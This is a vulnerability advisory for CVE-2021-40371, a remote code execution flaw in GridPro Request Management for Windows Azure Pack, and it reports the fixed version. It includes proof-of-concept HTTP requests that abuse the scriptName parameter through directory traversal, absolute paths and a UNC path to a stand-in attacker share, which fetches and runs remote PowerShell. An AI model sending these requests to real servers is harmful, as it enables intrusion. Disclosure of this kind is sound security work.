RCE in GridPro Request Management for Windows Azure Pack (CVE-2021-40371)

We recently discovered a vulnerability in GridPro Request Management versions <=2.0.7905 for Windows Azure Pack by GridPro Software. The vulnerability was assigned CVE-2021-40371 by GridPro [1] and in the worst case scenario allows attackers to remotely execute code on the server.

Introduction

Windows Azure Pack delivers cloud capabilities to on-premise datacenters. GridPro Request Management for Azure Pack adds business processes, custom services, and customer support by integrating Microsoft System Center Service Manager with Windows Azure Pack in a unified cloud platform.

The vulnerability

GridPro Request Management for Windows Azure Pack provides the ability to execute PowerShell scripts. Through specific JSON parameters in HTTP requests the plugin takes relative path locations as input to execute the desired PowerShell scripts on the server. Through multiple techniques however, it is possible to reach PowerShell scripts in other directories that may not be intended to be executed by the application and can therefore lead to remote code execution.

  1. Through directory traversal attacks (e.g. usage of one or more ..\) it is possible to reach parent directories outside the original web directory and execute arbitrary local scripts the web server account has access to.
  2. Through fully qualified path names (e.g. C:\Temp\script.ps1) it is possible to execute arbitrary local scripts the web server account has access to, when the full path to the script is known.
  3. By using UNC paths (e.g. \\attacker-server\share$\script.ps1) it is possible to execute arbitrary PowerShell scripts from attacker-controlled remote network shares.

Proof of concept

Typical HTTP requests that execute PowerShell scripts on the server may look as follows. It is important to note that adding a second backslash is necessary to properly escape the backslash character:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"Directory1\\Directory2\\OriginalScript.ps1",[...]

By default, this relative path lies under the configured web server directory. The possible attack types to gain access to PowerShell scripts in other directories or shares are described in the following sections.

1. Directory Traversal

Using a directory traversal, it is possible to e.g. execute a local script C:\Temp\script.ps1:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"..\\..\\..\\..\\..\\..\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell scripts to the server and guessing their storage location to gain remote code execution or by abusing existing PowerShell scripts on the server.

2. Direct Access Using The Fully Qualified Path Name

Using the fully qualified path name it is again possible to e.g. execute the local script C:\Temp\script.ps1:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"C:\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell scripts to the server and knowing their exact storage location to gain remote code execution or by abusing existing PowerShell scripts on the server.

3. Execution Of Attacker-Controlled Scripts From Network Shares

Using UNC paths, it is possible to e.g. execute arbitrary scripts from remote attacker-controlled network shares:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"\\\\attacker-server\\share$\\script.ps1",[...]

An attacker can exploit this by preparing arbitrary PowerShell scripts on an attacker-controlled network share and get them executed on the target server to gain remote code execution.

Resolution

GridPro fixed this vulnerability in GridPro Request Management for Windows Azure Pack version 2.0.7912 and later. [2]

Appendix

References

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40371
[2] https://support.gridprosoftware.com/hc/en-us/articles/360021921513-Request-Management-for-WAP-Release-Notes
[3] https://certitude.consulting/advisories/CSA_2021_003_Remote_Code_Execution_in_GridPro_Request_Management_for_Windows_Azure_Pack.md.txt